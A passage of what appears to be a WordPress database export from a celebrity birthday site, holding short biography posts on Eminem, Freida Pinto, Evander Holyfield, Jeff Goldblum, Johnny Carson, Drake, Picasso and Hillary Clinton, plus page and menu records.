outcast at each school he attended. He was beat up all the time, and even accused his mother of being addicted to prescription drugs. Along with subjecting him to physical and emotional abuse. This led to a lawsuit that was settled later on.\r\n\r\nHe attended <a href=\"https://en.wikipedia.org/wiki/Lincoln_High_School_(Warren,_Michigan)\" target=\"_blank\">Lincoln High School</a> in Warren, Michigan. He failed ninth grade three times, and dropped out when he was 17 years old. Even though he was a poor student, Eminem studied the dictionary and read a lot comic books. He described his affinity for the English language like this:\r\n\r\n<em>“I found that no matter how bad I was at school, like, and no matter how low my grades might have been at some times, I always was good at English... I just felt like I wanna be able to have all of these words at my disposal, in my vocabulary at all times whenever I need to pull \'em out. You know, somewhere, they\'ll be stored, like, locked away.”</em>\r\n\r\nEminem found a way to express his passion for language, and a way to channel the rage he felt. Hip-hop had recently entered the scene, and through it, he started rapping in the late 1980s and early 1990s. Eminem soon became known in the Detroit rap scene. Often entering into rap battles with improvised rap lyrics. Eminem proved he could hold his own, and soon became a respected figure in the Detroit underground rap scene.\r\n<h3>Career Accomplishments</h3>\r\n<img class=\"alignright wp-image-413\" title=\"Eminem\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Eminem_.jpg\" alt=\"Eminem\" width=\"207\" height=\"276\" /><a href=\"http://www.imdb.com/name/nm0004896/awards\" target=\"_blank\">Eminem</a> released the album <em>The Slim Shady LP</em> in 1999. The went on to go multi-platinum. His album won him four MTV Video Music Awards and two Grammy Awards. The following year, he released <em>The Marshall Mathers LP</em> album. It soon became one of the fastest selling albums ever sold in rap history. He released <em>Recovery</em> in 2010, and it won him another Grammy.\r\n<h3>Most Known For</h3>\r\nEminem is usually recognized as Slim Shady, his nickname. His album, <em>Recovery</em>, is autobiographical in nature. In the album, his shares his experience with rehab and struggle with drug addiction. He released his eight album, MMLP2 in 2013. He reached the top charts with the single “The Monster” featuring Rihanna, earning him a Grammy Award for Best Rap/Sung Collaboration.\r\n<h3>Current Personal Life</h3>\r\nAfter divorcing his wife, Kimberly Scott in 2006, Eminem has remained single. He has a 19-year-old daughter with Scott. He also is the legal guardian of Scott\'s niece Alaina Marie Mathers, and her daughter with another man, Whitney Mathers.\r\n<h3>Where Are They Now</h3>\r\nEminem went on a long hiatus from recording, but returned in 2009 with the release of his album called <em><a href=\"http://www.rollingstone.com/music/albumreviews/relapse-20090511\" target=\"_blank\">Relapse</a></em>. He released another album called <em>Relapse 2</em> in August later that same year, but neither of these albums sold like his earlier releases at the beginning of his career. Each album did gain platinum status though, helping to re-establish Eminem in the pop universe.\r\n\r\n[<a href=\"https://www.flickr.com/photos/superbriu/4930467466/sizes/z/\" target=\"_blank\">Image 1</a>] [<a href=\"https://www.flickr.com/photos/thecomeupshow/3327240935/sizes/m/\" target=\"_blank\">Image 2</a>]\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Eminem?</h2>','Eminem','','publish','open','open','','eminem-birthday','','','2015-10-30 16:04:48','2015-10-30 16:04:48','',0,'http://birthdaypedia.com/?p=411',0,'post','',0),(412,2,'2015-10-13 16:41:33','2015-10-13 16:41:33','','Eminem','','inherit','open','closed','','eminem','','','2015-10-13 16:41:33','2015-10-13 16:41:33','',411,'http://birthdaypedia.com/wp-content/uploads/2015/10/Eminem.jpg',0,'attachment','image/jpeg',0),(413,2,'2015-10-13 16:41:37','2015-10-13 16:41:37','','Eminem_','','inherit','open','closed','','eminem_','','','2015-10-13 16:41:37','2015-10-13 16:41:37','',411,'http://birthdaypedia.com/wp-content/uploads/2015/10/Eminem_.jpg',0,'attachment','image/jpeg',0),(417,2,'2015-10-14 19:55:32','2015-10-14 19:55:32','<p style=\"text-align: center;\"><a href=\"http://birthdaypedia.com/wp-content/uploads/2015/07/iStock_000008906483_Small.jpg\"><img class=\"wp-image-399 aligncenter\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/07/iStock_000008906483_Small.jpg\" alt=\"iStock_000008906483_Small\" width=\"700\" height=\"416\" /></a></p>\r\n<p style=\"text-align: left;\"><span style=\"color: #ff0000;\">We love to receive emails! If you have a question, concern or comment, please feel free to contact us below! You can also use the form to reach out to our sales team regarding advertising on the site.</span></p>\r\n<p style=\"text-align: center;\">[contact-form-7 id=\"186\" title=\"Contact form 1\"]</p>\r\n<p style=\"text-align: left;\"></p>','Contact Us','','publish','closed','closed','','contact-us-2','','','2017-01-27 19:45:12','2017-01-27 19:45:12','',0,'http://birthdaypedia.com/?page_id=417',0,'page','',0),(420,2,'2015-10-18 08:04:49','2015-10-18 08:04:49','Freida Pint is a famous model and actress. She traveled the modeling circuit in Dubai, and was represented at the time by <a href=\"http://www.fashionmodeldirectory.com/agencies/elite-model-management-new-delhi/\" target=\"_blank\">Elite Model Management India</a>. She modeled for two years before she got a huge break from the director Danny Boyle. Frieda played the female lead, Latika, in the movie <em>Slumdog Millionaire,</em> which was released in 2008.\r\n<h3>In the Beginning</h3>\r\nFreida Pinto was born on October 18, 1984 in <a href=\"https://en.wikipedia.org/wiki/Mumbai\" target=\"_blank\">Mumbai, India</a>. Her mother worked as a principal of a high school, while her father worked as a banker. Her sister, Sharon, works as a producer for the Indian news channel called NDTV.\r\n\r\nEver since she was young, Freida knew she wanted to be a model. She graduated from St. Xavier\'s College in Mumbai with a bachelor\'s degree in English. Soon after, she was recruited by the Elite Model agency in India when she was twenty years old. She went on to do campaigns for e-Bay, Chanel, and even Visa.\r\n<h3>Career Accomplishments</h3>\r\nIn 2006 – 2007, she was the anchor for a TV travel show called <em>Full Circle</em>. The show involved her going to several Asian countries like Singapore, Afghanistan, Indonesia, and even Fiji. She had no acting experience at the time, but she auditioned for the film <em><a href=\"http://www.imdb.com/title/tt1010048/\" target=\"_blank\">Slumdog Millionaire</a></em>. The movie premiered for the first time at the 2008 Toronto International Film Festival in 2008 in September.\r\n\r\nThe movie was described by viewers as “one in a million” and “a masterpiece.\" Freida even received the <a href=\"http://www.imdb.com/name/nm2951768/awards\" target=\"_blank\">People\'s Choice award</a>, and was honored at the 2009 Palm Springs International Film Festival with the Breakthrough Performance award. She also received a BAFTA nomination for Best Supporting Actress.\r\n<h3>Most Known For</h3>\r\nDespite how much time has passed, Freida Pinto is still widely recognized for the role she played in <em>Slumdog Millionaire</em>. She has also appeared in a number of TV shows as well. Anchoring the show <em>Full Circle</em>, and appearing in the show <em>Wendell Rodricks for Lakme Fashion Week 2006. </em>Other films Freida have starred in are <em><a href=\"https://en.wikipedia.org/wiki/You_Will_Meet_a_Tall_Dark_Stranger\" target=\"_blank\">You Will Meet a Tall Dark Stranger</a></em> in 2010, <em>Rise of the Planet of the Apes</em> in 2011, <em>Immortals</em> in 2011, <em>Trishna</em> in 2012, and <em><a href=\"http://www.imdb.com/title/tt2403393/\" target=\"_blank\">Desert Dancer</a></em> in 2015.\r\n<h3>Current Personal Life</h3>\r\nFreida Pinto, despite her success, still considers herself just a normal person. As she puts it:\r\n\r\n<em> “After this success, I still consider myself to be a regular Mumbai girl. I’m just one that has been extremely blessed.”</em>\r\n\r\nShe is also signed up with one of the leading talent agencies in the world, CAA, and has the possibility to choose a few of the parts she wants to play. At one point, after the film <em>Slumdog Millionaire</em>, she did attend a three month workshop being held by Barry John. Who is a theater guru, and a veteran in the acting arts. This helped her greatly with her acting, and has shown from the roles she has played in later films. Freida Pinto has a lot of potential, and has only continued to grow as a star.\r\n<h3>Where Are They Now</h3>\r\nFreida Pinto is only just getting started with her acting career. For every film she stars in, she only gets better and better. Her success has grown to the point now where she may have the option to pick and choose the roles she plays. Freida is very humble, and is still active in her fashion career from time to time.\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Freida Pinto?</h2>\r\n<h2 style=\"text-align: center;\"></h2>\r\n ','Frieda Pinto','','publish','open','open','','freida-pinto-birthday','','','2015-10-30 16:19:49','2015-10-30 16:19:49','',0,'http://birthdaypedia.com/?p=420',0,'post','',0),(421,2,'2015-10-19 07:04:52','2015-10-19 07:04:52','Evander Holyfield is a skilled boxer with the nickname The Real Deal. He fought in the Olympics, and was the World Heavyweight Champion from 1990 – 1992. He held the title once more from 1993 – 1994.\r\n<h3>In the Beginning</h3>\r\nEvander Holyfield was born on October 19, 1962 in <a href=\"https://en.wikipedia.org/wiki/Atmore,_Alabama\" target=\"_blank\">Atmore, Alabama</a>, but grew up in Atlanta, Georgia. As a child, he took many boxing lessons, helping to lay the foundation for his future. As he grew older, he competed in the Golden Glove competitions during the 1980s. He won the national <a href=\"http://www.goldengloves.com/history/\" target=\"_blank\">Golden Gloves Championship</a> in 1984. Soon after, he was able to make it onto the U.S. Olympic team.\r\n\r\nHe participated in the 1984 Olympics being held in Los Angeles. Sadly, he saw disappointment in the ring. Evander was disqualified while in a semifinal match with Kevin Barry of New England, because hit his opponent after a break. There were people who disputed the call the referee made. However, Evander did earn the bronze medal regardless.\r\n<h3>Career Accomplishments</h3>\r\nEvander won the bronze medal during the 1984 Los Angeles Olympics before starting his professional boxing career. He became the Heavyweight Boxing Champion of the World after he defeated <a href=\"http://atlanta.cbslocal.com/2012/10/25/the-sports-kings-holyfield-vs-douglas-flashback-october-25-1990/\" target=\"_blank\">James “Buster” Douglas</a> in 1990. He eventually lost the title to Riddick Bowe in 1992. Evander was able to win it back when he had a rematch with Bowe. Evander lost the title a second time when Michael Moore won it in 1994.\r\n\r\nIn 1999, he went up against <a href=\"https://en.wikipedia.org/wiki/Lennox_Lewis\" target=\"_blank\">Lennox Lewis</a>. The first match they had ended with a draw. They had another rematch later in the year, but Lewis came out as the victor. Evander did win his fourth championship in 2000 though, winning the WBA championship from John Ruiz, but he once again lost the victory to Ruiz the following year.\r\n<h3>Most Known For</h3>\r\nWhile Evander Holyfield is famous for his participation in the 1984 Olympics in Los Angeles for the bronze medal he won. Many people recall Evander Holyfield for the fight he had with Mike Tyson. Evander had defeated Tyson previously in 1996 in order to win the WBA championship. While they were fighting, Tyson bit Evander\'s ear twice during the match -- taking a chunk out of it.\r\n\r\nTyson was disqualified from the fight, and the behavior he demonstrated in the ring became international news. Evander forgave Mike Tyson for what he did, and went on to get his IBF title back from Michael Moore.\r\n<h3>Current Personal Life</h3>\r\nEvander still boxes, but his career as a boxer has begun to slow down. In 1999, he married his second wife Janice. The marriage eventually ended in divorce in 2000. The divorce became ugly though when he made a request to have a paternity test done on their child at the time.\r\n<h3>Where Are They Now</h3>\r\nEvander is still pursuing his boxing career, but it has begun to slow down. He did beat Jeremy Bates with a knockout in 2006. It was the first fight he had had in over two years.\r\n\r\nEver since, he has started to look into other business opportunities. He appeared as a contestant on <em>Dancing with the Stars</em> in 2005. He even wrote a memoir called <em>Becoming Holyfield: A Fighter\'s Journey</em>, which he released in 2008. In 2014, Evander was honored by being inducted into the <a href=\"http://www.nvbhof.com/\" target=\"_blank\">Nevada Boxing Hall of Fame</a>. Mike Tyson was the one who presented Evander with the trophy.\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Evander Holyfield?</h2>\r\n<h2 style=\"text-align: center;\"></h2>\r\n ','Evander Holyfield','','publish','open','open','','evander-holyfield-birthday','','','2015-11-09 17:00:27','2015-11-09 17:00:27','',0,'http://birthdaypedia.com/?p=421',0,'post','',0),(422,2,'2015-10-14 19:54:12','2015-10-14 19:54:12','[vc_row full_width=\"\" parallax=\"\" parallax_image=\"\"][vc_column width=\"1/1\"][vc_column_text]\r\n\r\nGet in touch with us to discuss your custom ad campaign. We have the ability to deliver display (standard IAB sizes) as well as rich media. We look forward to hearing from you!\r\n\r\n[/vc_column_text][/vc_column][/vc_row][vc_row full_width=\"\" parallax=\"\" parallax_image=\"\"][vc_column width=\"1/1\"][contact-form-7 id=\"186\"][/vc_column][/vc_row]','Advertise With Us','','publish','closed','closed','','advertise-with-us','','','2015-10-14 19:54:42','2015-10-14 19:54:42','',0,'http://birthdaypedia.com/?page_id=422',0,'page','',0),(440,2,'2015-10-14 20:02:06','2015-10-14 20:02:06',' ','','','publish','closed','closed','','440','','','2017-01-27 19:45:43','2017-01-27 19:45:43','',0,'http://birthdaypedia.com/?p=440',2,'nav_menu_item','',0),(442,2,'2015-10-14 20:02:06','2015-10-14 20:02:06','','Become A Guest Blogger','','publish','closed','closed','','become-a-guest-blogger','','','2017-01-27 19:45:44','2017-01-27 19:45:44','',0,'http://birthdaypedia.com/?p=442',3,'nav_menu_item','',0),(443,2,'2015-10-14 20:02:06','2015-10-14 20:02:06',' ','','','publish','closed','closed','','443','','','2017-01-27 19:45:43','2017-01-27 19:45:43','',0,'http://birthdaypedia.com/?p=443',1,'nav_menu_item','',0),(449,2,'2015-10-22 08:58:04','2015-10-22 08:58:04','Jeff Goldblum has appeared in famous films and TV shows. Including his performance for not <em>Jurassic Park</em> and <em>The Lost World</em>.\r\n<h3>In the Beginning</h3>\r\nJeff Goldblum was born on October 22, 1952 in <a href=\"http://pittsburghpa.gov/\" target=\"_blank\">Pittsburgh, Pennsylvania</a>. Ever since he was a young child, Jeff knew he wanted to pursue a career in acting. He kept his desire a secret from his friends and family though. He didn\'t have a real chance to try out drama until his teen years. During the summer he took sessions at <a href=\"http://www.cmu.edu/\" target=\"_blank\">Carnegie Mellon University</a> when he was only 17 years old. Eventually finding his way to New York City, and studying alongside Sanford Meisner.\r\n\r\nGoldblum participated in stage productions, and even scored a few small roles during the 1970s. A couple of films he played in were:\r\n<ul>\r\n <li><em>Death Wish</em> (1974)</li>\r\n <li><em>California Split</em> (1974)</li>\r\n <li><em>Nashville</em> (1975)</li>\r\n <li><em>Annie Hall</em> (1977)</li>\r\n</ul>\r\nAs Goldblum continued to pursue his career, he was able to get involved with bigger name projects like Invasion of the Body Snatchers in 1978, Threshold in 1981, and even playing the role of Ichabod Crane in <em>The Legend of Sleepy Hollow</em>.\r\n<h3>Career Accomplishments</h3>\r\nJeff Goldblum has always been noted as being a bit of a quirky actor. He starred in the film <em>The Adventure of Buckaroo Banzai Across the 8<sup>th</sup> Dimension</em> in 1984. The film became a cult classic, but Jeff didn\'t have his real breakthrough until he starred in the remake of <em><a href=\"http://www.imdb.com/title/tt0091064/\" target=\"_blank\">The Fly</a></em> in 1986. In the 1990s, he starred in a few of the biggest blockbusters for their time. <em><a href=\"https://en.wikipedia.org/wiki/Jurassic_Park_(film)\" target=\"_blank\">Jurassic Park</a></em> in 1993, and playing one of the main roles for its sequel in <em>The Lost World: Jurassic</em> Park in 1997. It helped set the stage for him playing the intellectual characters in movies, including Independence Day in 1996.\r\n<h3>Most Known For</h3>\r\nJeff Goldblum is mostly known for his role (and perhaps the film that helped solidify his acting career) in the Jurassic Park film series. Starring in the first film, and playing one of the main roles for its sequel too. Some of the more recent works he\'s played is a few critically acclaimed films like <em>Igby Goes Down</em> in 2002, <em>The Life Aquatic with Steve Zissou</em> in 2004, and in 2009 starring in the crime series <em>Law & Order: Criminal Intent</em>.\r\n<h3>Current Personal Life</h3>\r\nJeff Goldblum has been married at least three times so far. He married Patricia Gaul, and stayed with her from 1980 to 1986. They divorced, and he got married in 1987 to actress <a href=\"http://www.imdb.com/name/nm0000133/\" target=\"_blank\">Geena Davis</a>. In 1990, the couple went their separate ways. He married Emilie Livingston in 2014, and welcomed their son Charlie Ocean into the world on July 4, 2015.\r\n<h3>Where Are They Now</h3>\r\nGoldblum has not quite pursued the path of fame like other actors. He has continued to star in a couple of films. He became more active in Law & Order: Criminal Intent. Playing the role of Detective Zack Nichols on the show. His stage work has also been noticed due to his performances for The Pillowman and Seminar.\r\n\r\nCurrently, Goldblum is teaching at the Playhouse West in Los Angeles.\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Jeff Goldblum?</h2>\r\n<p style=\"text-align: left;\">[<a href=\"https://www.flickr.com/photos/chaircrusher/12461643795/in/photolist-jZcbxv-AzmxaB-yqrsAQ-ykyvFc-5geaS1-7Nqa9s-4da59s-cHPjmN-7jNyHf-3jn7V-5kQrVt-6gR7jw-7NMC8g-cQwUJq-9PJqq2-dNsDTp-8nxz28-3jncv-9A32Mp-2nKe6L-2nKe7w-oEHg4p-oCFEug-9A32Jk-983qJ4-5FSis-6QJSJg-oc3R3H-kAoAZ3-53uYHx-qW86oP-fmuj8Z-82ZRMZ-77M5c-5aX1px-xSfq1-5mQP7k-7c53SR-hMSVZ-6oR4Gp-4Jawtm-7Nmb5n-8LFQki-cVonWE-bpfTZM-5erFm-efa2Bv-8gCYjD-8gCYgk-8gGeZf\" target=\"_blank\">Image</a>]</p>\r\n ','Jeff Goldblum','','publish','open','open','','jeff-goldblum-birthday','','','2015-11-20 20:56:30','2015-11-20 20:56:30','',0,'http://birthdaypedia.com/?p=449',0,'post','',0),(450,2,'2015-10-23 08:58:19','2015-10-23 08:58:19','Before his death, Johnny Carson was dubbed the “King of Late Night TV.\" He was the leader for three whole decades when it came to the late night show. He was the host of “The Tonight Show,\" his farewell show airing in 1992. It attracted over 50 million viewers, and many people still remember him to this day.\r\n<h3>In the Beginning</h3>\r\nJohnny Carson was born on October 23, 1925 in <a href=\"https://en.wikipedia.org/wiki/Corning,_Iowa\" target=\"_blank\">Corning, Iowa</a>. Her parents were Homer R. Carson and Ruth Carson. From a young age, Johnny Carson found out how to draw his audience in. He was in love with magic when he was only 12 years old. Even purchasing a magician\'s kit and performing a couple of magic tricks for the public. Dubbing himself as “The Great Carson.”\r\n\r\nAfter he graduated high school in 1943. Carson was 18 years old when he decided to join the <a href=\"http://www.military.com/veteran-jobs/career-advice/military-transition/famous-veteran-johnny-carson.html\" target=\"_blank\">U.S. Navy</a>. He worked as a communications officer decoding encrypted messages. He even served aboard the USS Pennsylvania, and continued to perform magic for his shipmates.\r\n\r\nIn 1945, he studied at the University of Nebraska. Carson earned a bachelor\'s degree in radio and speech. After he completed college, he did a short stint on TV as the writer for <em><a href=\"http://www.museum.tv/eotv/redskeltons.htm\" target=\"_blank\">The Red Skelton Show</a></em> in Los Angeles. He moved to New York City later, searching for a larger audience.\r\n<h3>Career Accomplishments</h3>\r\nJohnny Carson got his big break when he hosted <em><a href=\"http://www.history.com/this-day-in-history/johnny-carson-makes-debut-as-tonight-show-host\" target=\"_blank\">The Tonight Show</a></em>. He went on to host the show for thirty years. He even won an Emmy Award for having such a long run. His last appearance on the show was in 1992, and attracted 50 million viewers.\r\n<h3>Most Known For</h3>\r\nJohnny replaced Jack Paar on <em>The Tonight Show</em> in 1962. During his first year on the show, his ratings tended to hover between good and bad. After a rocky start though, Carson soon became a hit on the show. His success was due to his personality. He had a calming presence, quick wit, and even gave interviews that were crisp and to the point. Over the years, Johnny became a guide to viewers. He had a familiarity to him that his audience enjoyed, and relied on for years.\r\n<h3>Personal Life</h3>\r\nJohnny Carson did experience rocky relationships throughout his life. He was married four times in total. Carson married a woman named Jody Wolcott in 1948. They had three sons named Richard, Charles, and Cory. Richard passed away due to a car accident.\r\n\r\nThe couple divorced in 1963. Carson married Joanne Copeland soon after the divorce. His relationship with Joanne ended in 1972, and ended up with a drawn out legal battle. Copeland did receive $500,000 for the settlement along with annual alimony. In the same year, Carson married Joanna Holland. They filed for divorce in 1973.\r\n\r\nHe married once again in June of 1987 to a woman named Alexis. They remained together until Carson passed away 18 years later.\r\n<h3>Legacy</h3>\r\nHe passed away in January of 2005 at 79 years of age. Despite his passing, Carson is still considering one of the biggest stars to ever come to American television. Being on par with other mainstream comics like <a href=\"http://birthdaypedia.com/jimmy-fallon/\">Jimmy Fallon</a> and Jerry Seinfeld. He\'s still considered to be television legacy, and will certainly will be continued to be remembered.\r\n<h2 style=\"text-align: center;\">Do you have the same birthday as Johnny Carson?</h2>\r\n[<a href=\"https://commons.wikimedia.org/wiki/Category:Johnny_Carson#/media/File:Johnny_carson_1957.JPG\" target=\"_blank\">Image</a>]\r\n<h2 style=\"text-align: center;\"></h2>','Johnny Carson (1952-2005)','','publish','open','open','','johnny-carson-birthday','','','2015-11-23 22:00:26','2015-11-23 22:00:26','',0,'http://birthdaypedia.com/?p=450',0,'post','',0),(451,2,'2015-10-24 09:18:20','2015-10-24 09:18:20','His full name is Aubrey Drake Graham. He\'s a rap and TV star who is well known throughout the world. On Degrassi: The Next Generation, he played the role of the wheelchair bound Jimmy Brooks. Now, however, people know Drake by his rap songs.\r\n<h3>In the Beginning</h3>\r\nGraham was born on October 24, 1986 in Toronto, Canada. Growing up, Drake already had music beating through his veins. His father, Dennis Graham, was a drummer for Jerry Lee Lewis. Sandi Graham, Drake\'s mother, comes from a music-oriented family as well.\r\n\r\nDrake has a rich racial and religious background. His mother is a white Canadian Jew, and his father is an African American Catholic. Drake has spoken about his personal identity, and he could not have summed it up better than this: <em>“At the end of the day, I consider myself a black man because I\'m more immersed in black culture than any other. Being Jewish is kind of a cool twist. It makes me unique.”</em>\r\n\r\nWhen he was only five years old, his parents divorced. His mother continued to raise him in Forest Hill. The Toronto neighborhood was predominately Jewish. When he turned 13, he had his own Bar Mitzvah, and often recognized the Jewish High Holy Days alongside his mother.\r\n\r\nHe attended Forest Hill Collegiate institute, and it was an almost all-white high school. A classmate of his helped give him his start in the entertainment industry. As he describes it: \"<em>There was a kid in my class whose father was an agent. His dad would say, \'If there\'s anyone in the class that makes you laugh, have them audition for me.\' After the audition he became my agent.”</em>\r\n<h3>Career Accomplishments</h3>\r\nHe rose to fame pretty quickly for his age. He went on to star in seven seasons of the show for teens called <em><a href=\"https://www.thewrap.com/drake-reunites-with-degrassi-the-next-generation-co-stars-at-we-are-disorderly-premiere/\" target=\"_blank\">Degrassi: The Next Generation</a></em>. Drake began to produce a couple of mixtapes, and in 2006 they entered circulation. He was able to sign a record deal in 2009. Pretty soon he was churning out a couple of hit songs which include “Take Care,\" “Every Girl,\" \"Money to Blow,\" and “Best I Ever Had.\"\r\n<h3>Most Known For</h3>\r\nHis stardom is still new, and there is a lot of potential for future growth. At the moment, Drake is knowns for his role in music, and is affiliation with fellow rappers Lil\' Wayne and Nicki Minaj.\r\n<h3>Current Personal Life</h3>\r\nDrake has had quite a bit of success, but his personal life has been a bit rocky as of late. In recent years, he and <a href=\"http://birthdaypedia.com/pop-singer-chris-brown/\">Chris Brown</a> became rivals over Rihanna. The rivalry erupted into violence in 2012 at a nightclub in New York. There were several people injured due to the fight between Drake and Brown. Drake was not criminally charged for the incident, but he found himself facing legal consequences due to his actions. There have been suits filed against him, and in 2013 legal proceedings were taking place with Brown over who was responsible for the fight.\r\n\r\nDuring this time, he had to settle yet another legal matter. Out of court he and his ex-girlfriend, <a href=\"http://www.hollywoodreporter.com/thr-esq/drake-girlfriend-marvins-room-lawsuit-286916\" target=\"_blank\">Ericka Lee</a>, reach an agreement about the contributions for the song “Marvin\'s Room.\" She sued drake in 2012 for not crediting her for writing the track with him.\r\n<h3>Where Are They Now</h3>\r\nDrake is still involved in his career. In February 2015, Drake released \"If You\'re Reading This It\'s Too Late.\" His next album, \"Views From The 6,\" is rumored to drop in January 2016.\r\n<h2 style=\"text-align: center;\">Do you share the same birthday as Drake?</h2>\r\n[<a href=\"https://www.flickr.com/photos/bandfan/4972204415/in/photolist-8znR9k-jR18f-dTshv5-8GiM72-mH5abq-5fbkEo-5fbkhG-5fbjR7-5f6WLZ-5fbjfC-5fbiVG-5fbiA5-5f6VwT-5fbhU5-9tfq1T-8mNBXL-b8N57i-6DDh1y-6DDgXU-6Dz7N6-6Dz7HB-6Dz7jv-6Dz7g8-5fbhns-e3rU4J-byLHs6-aK4CWk-cpgNS3-6nj6Z-6nj6b-6nj5Q-6nj5J-6nj5B-6nj5q-6nj5b-6nj4Y-6nj4h-6nj3S-6nj3E-6nj61-6nj4K-4pEin3-nVq5ha-atrZup-atrYUV-atrXGr-atuCtA-atrXet-atrWx2-a2T4cM\" target=\"_blank\">Image</a>]','Drake','','publish','open','open','','drake-birthday','','','2015-11-23 22:32:11','2015-11-23 22:32:11','',0,'http://birthdaypedia.com/?p=451',0,'post','',0),(453,2,'2015-10-16 20:34:17','2015-10-16 20:34:17',' ','','','publish','closed','closed','','453','','','2017-01-27 19:46:14','2017-01-27 19:46:14','',0,'http://birthdaypedia.com/?p=453',1,'nav_menu_item','',0),(454,2,'2015-10-16 20:34:17','2015-10-16 20:34:17',' ','','','publish','closed','closed','','454','','','2017-01-27 19:46:15','2017-01-27 19:46:15','',0,'http://birthdaypedia.com/?p=454',2,'nav_menu_item','',0),(455,2,'2015-10-16 20:34:17','2015-10-16 20:34:17',' ','','','publish','closed','closed','','455','','','2017-01-27 19:46:16','2017-01-27 19:46:16','',0,'http://birthdaypedia.com/?p=455',3,'nav_menu_item','',0),(457,2,'2015-10-16 20:34:17','2015-10-16 20:34:17',' ','','','publish','closed','closed','','457','','','2017-01-27 19:46:17','2017-01-27 19:46:17','',0,'http://birthdaypedia.com/?p=457',4,'nav_menu_item','',0),(459,2,'2015-10-16 20:34:17','2015-10-16 20:34:17',' ','','','publish','closed','closed','','459','','','2017-01-27 19:46:17','2017-01-27 19:46:17','',0,'http://birthdaypedia.com/?p=459',5,'nav_menu_item','',0),(460,2,'2015-10-16 20:34:17','2015-10-16 20:34:17',' ','','','publish','closed','closed','','460','','','2017-01-27 19:46:18','2017-01-27 19:46:18','',0,'http://birthdaypedia.com/?p=460',6,'nav_menu_item','',0),(464,2,'2015-10-16 20:34:18','2015-10-16 20:34:18',' ','','','publish','closed','closed','','464','','','2017-01-27 19:46:19','2017-01-27 19:46:19','',0,'http://birthdaypedia.com/?p=464',7,'nav_menu_item','',0),(466,2,'2015-10-16 20:34:18','2015-10-16 20:34:18',' ','','','publish','closed','closed','','466','','','2017-01-27 19:46:19','2017-01-27 19:46:19','',0,'http://birthdaypedia.com/?p=466',8,'nav_menu_item','',0),(496,2,'2015-10-25 09:32:21','2015-10-25 09:32:21','Pablo Picasso has been called the one of the most influential artists ever to come out of the 20<sup>th</sup> century. He\'s the co-creator of Cubism, and is known as a Spanish expatriate. However, he was much more than that, his artistic talents saw no bounds as a stage designer, painter, ceramicist, sculptor, and even print maker.\r\n<h3>In the Beginning</h3>\r\nPablo Picasso was born on October 25, 1881 in <a href=\"https://en.wikipedia.org/wiki/M%C3%A1laga\" target=\"_blank\">Málaga, Spain</a>. His father, Don José Ruiz Blasco, worked as an art teacher and painter. Even as a child Pablo was world weary and serious. He has been described as having piercing eyes that were ever watchful. As the artist himself once recalled: <em>“When I was a child, my mother said to me, \'If you become a soldier, you\'ll be a General. If you become a monk you\'ll end up as the Pope. Instead, I became a painter and wound up as Picasso.”</em>\r\n\r\nPablo was a poor student, but early on he showed he had a talent for drawing. When Pablo was only 13 years old, his skill for art had surpassed even his father\'s. Pablo showed little interest in schoolwork. Instead spending the majority of his school days drawing in his notebook.\r\n<h3>Career Accomplishments</h3>\r\nPablo Picasso is known as one of the creators of <a href=\"http://www.theartstory.org/movement-cubism.htm\" target=\"_blank\">Cubism</a>. He led a long career, and a large body of the work he did during his lifetime still exists to this day. His works of art contributed greatly to the modern art produced in the 20<sup>th</sup> century. Out of the 91 years he lived, Picasso dedicated 80 of them to artistic pursuit.\r\n<h3>Most Known For</h3>\r\nPicasso has produced over 50,000 ceramics, paintings, sculptures, engravings, and drawings. One of his most recognized periods is his “blue period.\" This is due to his all of his works from the time being painted with blue tones such as <a href=\"http://www.artic.edu/aic/collections/exhibitions/Modern/Guitarist\" target=\"_blank\"><em>The Old Guitarist</em> </a>in 1903. <em><a href=\"http://www.pablopicasso.org/avignon.jsp\" target=\"_blank\">Les Demoiselles d’Avignon</a></em> is another groundbreaking work of his, which is a distorted and fragmented representation of the human form. Pablo also contributed his sets and costumes to Sergei Diaghilev\'s Ballets Russes produced in 1917 and <em><a href=\"http://www.moma.org/collection/works/78630\" target=\"_blank\">The Three Musicians</a></em> in 1921.\r\n<h3>Current Personal Life</h3>\r\nPablo was called a bit of a womanizer. Throughout his life he had many relationships, including being married twice, girlfriends, prostitutes, mistresses, and even muses. He marred <a href=\"http://viola.bz/olga-khokhlova-picassos-wife/\" target=\"_blank\">Olga Khokhlova</a>, a ballerina, in 1918. They stayed together for nine years before they went their separate ways in 1927. He married his second wife, Jacqueline Roque, in 1961. In his lifetime he even fathered four children who were Paul, Maya, Claude, and Paloma.\r\n<h3>Legacy</h3>\r\nPablo Picasso died on April 8, 1972 in Mougins, France. He was 91 years old. Even towards the end, he constantly maintained a schedule about working, and believed his art would keep him alive. Despite his death, Pablo\'s contributions to the 20<sup>th</sup> century continue to be remembered to this day.\r\n\r\n \r\n<h2 style=\"text-align: center;\">Do you share a birthday with Pablo Picasso?</h2>','Pablo Picasso (1881 – 1973)','','publish','open','open','','pablo-picasso-birthday','','','2015-11-30 22:12:41','2015-11-30 22:12:41','',0,'http://birthdaypedia.com/?p=496',0,'post','',0),(497,2,'2015-10-26 09:48:54','2015-10-26 09:48:54','Hillary Clinton was elected to the U.S. Senate in 2001. She\'s also the First Lady of the United States, a practicing lawyer, volunteer, law professor, Senator from New York, and activist. Despite her career, she has never turned her back on her roots. Constantly fighting for what\'s important and never giving up on it.\r\n<h3>In the Beginning</h3>\r\nHillary Clinton was born on October 26, 1947 in <a href=\"http://www.cityofchicago.org/city/en.html\">Chicago, Illnois</a>. She grew up in the suburb of Park Ridge, Illinois. About fifteen miles from the city of Chicago. She was the first child born to Dorothy Emma Howell Rodham and Hugh Rodham. Hugh worked as a fabric store owner. Later, Hillary\'s two younger brothers were born. Hugh Jr. who was born in 1950, and Anthony who was born in 1954.\r\n\r\nEven as a young woman, Hillary was active in Republican groups. She even campaigned for Barry Goldwater as a nominee in 1964. She drew inspiration from public service, especially by the speech given by Reverend Martin Luther King Jr. in Chicago. It was around that time she became a Democrat.\r\n\r\nHillary went to Wellesley College, and was very active in politics. She was elected for senior class president, before graduating in 1969. Hillary went on to attend <a href=\"http://www.law.yale.edu/\" target=\"_blank\">Yale Law School</a> where she met Bill Clinton. She graduated in 1973 with honors. Hillary enrolled in the Yale Child Study Center, and went on to take courses on medicine and 